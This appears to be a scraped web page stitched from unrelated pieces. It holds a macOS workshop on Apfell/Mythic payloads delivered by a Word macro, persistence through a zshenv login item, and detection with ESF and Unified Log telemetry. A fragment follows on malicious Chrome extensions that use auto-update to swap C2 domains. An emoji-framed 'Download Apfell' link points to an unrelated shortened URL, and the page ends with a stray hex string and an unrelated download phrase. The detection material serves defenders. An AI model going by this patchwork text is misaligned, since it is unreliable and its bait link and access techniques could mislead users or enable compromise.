Over the three labs we have set out for this workshop, we're aiming to develop an initial level of understanding for some of the attacks we see against macOS and most importantly how we can implement appropriate detections. The labs for this workshop are comprised of the following key areas:
Before we begin this series, it is wise to acknowledge that throughout this workshop we have employed a lot of open source tools to gather the required telemetry. A number of these are not designed to be deployed at scale, but rather to simply demonstrate the telemetry that is available on macOS and that should be gathered by your EDR solution.
Download Apfell
Download 🔥 https://byltly.com/2yGbjJ 🔥
The vectors used to achieve a foothold on macOS devices are no different from those of other major operating systems. Phishing is arguably the most effective means of gaining access to a device, with common payload types such as:
During this workshop we will be utilising Cody Thomas's (@its_a_feature_) Mythic post-exploitation framework. Formerly known as Apfell, Mythic has been developed by Cody Thomas and his colleagues at SpecterOps as an excellent red teaming framework that works cross platform. For the purpose of this workshop we will be solely using the framework's Apfell payloads.
Upon following the framework installation guidance provided ( -c2.net) we are going to begin creating target payloads. Within Mythic select the 'Create Components' tab at the top of the screen and select 'Create Payload'. Next select the macOS operating system and chose the HTTP (apfell, poseidon) payload type. For simplicity within this workshop we will keep the majority of payload values default, however it is important to change the 'Callback Host' to the location of your Apfell server (assuming no redirectors are being used).
Next we will select the apfell payload and provide a description that will be unique to this initial payload. For the purpose of this workshop we will select all commands to be included within the payload.
Now that we have generated an apfell payload we are going to generate a Microsoft Word document that contains a macro designed to download and execute a payload. Firstly, open Microsoft Word and create a new document, then select macros from the 'Tools' dropdown menu:
Notice that this macro is downloading the apfell.js payload from a remote location. This is necessary for the apfell.js payload to execute properly. To host this payload remotely, you can use something like a Python web server using 'python -m SimpleHTTPServer ' whilst in a directory containing the payload.
At this point we have gained an initial foothold and we can begin interacting with the compromised system. For example, listing the current directory (In our case, "/Users/calumhall/Library/Containers/com.microsoft.Word/Data") we see our app.js payload:
This behaviour is a result of Apple's sandboxing capability ( _sandbox). This security control was introduced to the macOS ecosystem in an attempt to reduce the impact of a given application being compromised. As you might imagine, this situation is not ideal for an attacker, but makes life far easier for defenders!
While the sandbox inevitably makes things harder for attackers, it does not remove the threat entirely, as there are still a number of paths that may be traversed. In this workshop we will utilise Apfell's persist_loginitem_allusers functionality to gain persistence on the device. Login items have been exploited in the past by malware such as OSX.KitM that was designed to take periodic screenshots of compromised devices.
For the purpose of this workshop, we will assume users are running the latest version of macOS, and hence we know that the default shell is zsh. We can use this knowledge to create a login item that distributes a zsh environment profile that will call the "app.js" payload that our malicious macro dropped into the below location:
A zip file is used, as the macOS device will use its default file-handling functionality to unpack the ".zshenv" file once dropped to disk. We will now use Mythic's upload functionality to upload this zip file to the target device:
For the purpose of detecting these attacks, we are largely going to be relying on two core Apple logging functions: the Unified Log and the Endpoint Security Framework (ESF). Throughout the attack outlined above, there are numerous opportunities for detection, given that this initial lab is focussing on we are going to discuss identifying the following stages:
To monitor process activity within macOS we can utilise the ESF to gain information about new processes events. Using a tool such as Objective-See's ProcessMonitor we can investigate the process activity that takes place when our malicious document is opened:
The ESF generates an event revealing that Microsoft Word has forked another process, something that does not resemble legitimate application behaviour. This is the key area of detection that we are going to focus on for the purpose of this workshop. However, should we wish to gather more information we can see the full chain of events that occur due to our Office macro from ESF events, such as the execution of our malicious payload:
For detecting malicious process trees we'd definitely recommend checking out Jaron Bradley's tool - TrueTree. This has recently been adapted for Big Sur and now provides some awesome visibility into macOS process trees. For example, with our Apfell payload active, we can observe the osascript process that has spawned from Microsoft Word:
Using the ESF we are able to detect the malicious process activity as we have discussed above. Whilst this workshop has used Objective-See's ProcessMonitor to demonstrate this, any EDR solution that utilises the ESF should be able to gather the same telemetry.
While potentially difficult to utilise, the unified log contains a wealth of information regarding activity on macOS devices. Here we can see that the unified log has identified a failed event that has been denied due to Apple's sandbox, i.e. our "touch /tmp/test" command.
Whilst this telemetry can be incredibly valuable, it should be noted that this series of predicates are likely to produce some noise from legitimate Apple components. As such is may be required that further predicates are implemented to reduce this noise. For those that haven't worked with them before, predicates are a term given to certain conditions you can enforce to filter through the large quantities of events held within the Unified Logs.
To summarise, from the offensive perspective it's refreshing (or perhaps concerning) to see that Office Macros are still an issue even on Apple devices. We have demonstrated that whilst a hurdle, the Apple sandbox does not impose too much of a challenge for offensive operators, and that it should not be assumed a security control in this instance.
More importantly however, we've revealed that attacks of this nature can be detected with a reasonable degree of confidence! With the telemetry gathered by the ESF, not only can we detect the initial events that arouse suspicion, but we can also delve further into analysing the behaviour of the malicious payload. It is entirely reasonable to develop these detections further by looking for behaviour such as alerting on certain osascript usage, however it is important to avoid alert fatigue depending on the behaviour of your legitimate users.
However, when installing a signed profile, the OS will only prompt once for the install and then admin credentials. After the installation, the profile contents can be seen in the *Profiles *preference pane. If the profile is unsigned, that will be noted in red.
In order to easily manage bug fixes and security patches, extensions can be automatically updated. When hosting extensions in the Chrome Web Store, Google handles updating your extension. Just upload a new copy of your extension and after a few hours, the browser will update the extension via the web store. For extensions hosted outside the web store, developers have more control. Chrome uses the update url in the manifest.json file to periodically check for updates. During this process, Chrome will read the update manifest file and compare the version in the manifest with the current version of the extension. If the manifest version is higher, the browser will download the newest version of the extension and install it. For an example update manifest, please go here. The update manifest is an XML formatted file that contains the APPID and a URL that points to the .crx file. Auto-update is a particularly useful feature for adversaries. In Figures 4 and 5, a malicious extension uses one domain for standard C2 comms and uses another domain to host the update manifest and extension file. Imagine the scenario where incident response has identified the C2 domain as malicious and blocks all traffic to that domain (1). However, traffic to the update URL is still permitted (2 & 3). An adversary can update the manifest version, change the C2 domain (4), the update URL, and even modify some of the extensions core code. After some time, Google Chrome will make a request to the update URL and load the new version of the extension with new C2 domains.
Apfell is a post-exploitation framework centered around customization and modularity. The framework targets the macOS platform by default, but a user can create new C2 profiles that target any platform. Apfell is an ideal framework to use for a malicious Chrome extension. Lets walk through configuring a custom C2 profile and generating a payload.
2) Navigate to manage operations -> payload management. The payloads for apfell-jxa and linfell are both defined on this page. For each payload, there are several commands defined. Any of these commands can be modified within the console and then updated in the agent (specifically for apfell-jxa and linfell). At the bottom left corner of the payloads page is an import button. This allows a user to import a custom payload, along with each command, from a json file. Please import this file to save some time creating the payload. If the import was successful, you should see *chrome-extension *as a new payload type with a few commands to start. 152ee80cbc
amazon prime video download windows 10